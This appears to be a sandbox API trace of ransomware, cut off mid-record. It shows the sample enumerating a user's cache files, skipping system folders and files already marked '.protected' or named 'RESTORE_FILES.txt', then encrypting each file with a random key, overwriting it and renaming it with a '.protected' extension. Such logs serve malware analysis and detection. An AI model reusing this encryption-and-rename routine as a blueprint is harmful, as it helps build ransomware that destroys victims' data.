[0089.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.protected")) returned 1 [0089.171] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Windows") returned -1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files") returned -1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files (x86)") returned -1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="$Recycle.bin") returned 1 [0089.171] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="System Volume Information") returned -1 [0089.171] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.171] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".protected") returned 0x0 [0089.171] lstrcmpW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="RESTORE_FILES.txt") returned -1 [0089.171] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.171] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.172] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".txt") returned 0x0 [0089.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.172] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".rar") returned 0x0 [0089.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.172] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".zip") returned 0x0 [0089.172] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.173] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.173] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.173] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.173] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.173] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.174] CloseHandle (hObject=0x150) returned 1 [0089.174] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected") returned 162 [0089.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.protected")) returned 1 [0089.175] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Windows") returned -1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files") returned -1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files (x86)") returned -1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="$Recycle.bin") returned 1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="System Volume Information") returned -1 [0089.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".protected") returned 0x0 [0089.175] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="RESTORE_FILES.txt") returned -1 [0089.175] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.175] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".txt") returned 0x0 [0089.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".rar") returned 0x0 [0089.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".zip") returned 0x0 [0089.176] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x192, lpOverlapped=0x0) returned 1 [0089.176] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.176] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x192, lpOverlapped=0x0) returned 1 [0089.176] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.176] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.176] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.177] CloseHandle (hObject=0x150) returned 1 [0089.177] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected") returned 162 [0089.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.protected")) returned 1 [0089.177] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Windows") returned -1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files") returned -1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files (x86)") returned -1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="$Recycle.bin") returned 1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="System Volume Information") returned -1 [0089.178] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.178] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".protected") returned 0x0 [0089.178] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="RESTORE_FILES.txt") returned -1 [0089.178] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.178] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.178] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".txt") returned 0x0 [0089.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.178] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".rar") returned 0x0 [0089.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.179] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".zip") returned 0x0 [0089.179] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.179] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.179] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.180] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.180] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.180] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.180] CloseHandle (hObject=0x150) returned 1 [0089.180] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected") returned 162 [0089.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.protected")) returned 1 [0089.181] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Windows") returned -1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files") returned -1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files (x86)") returned -1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="$Recycle.bin") returned 1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="System Volume Information") returned -1 [0089.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".protected") returned 0x0 [0089.181] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="RESTORE_FILES.txt") returned -1 [0089.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".txt") returned 0x0 [0089.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".rar") returned 0x0 [0089.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".zip") returned 0x0 [0089.182] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.182] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.182] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.182] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.182] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.182] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.183] CloseHandle (hObject=0x150) returned 1 [0089.183] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected") returned 162 [0089.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.protected")) returned 1 [0089.183] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Windows") returned -1 [0089.183] lstrcmpiW 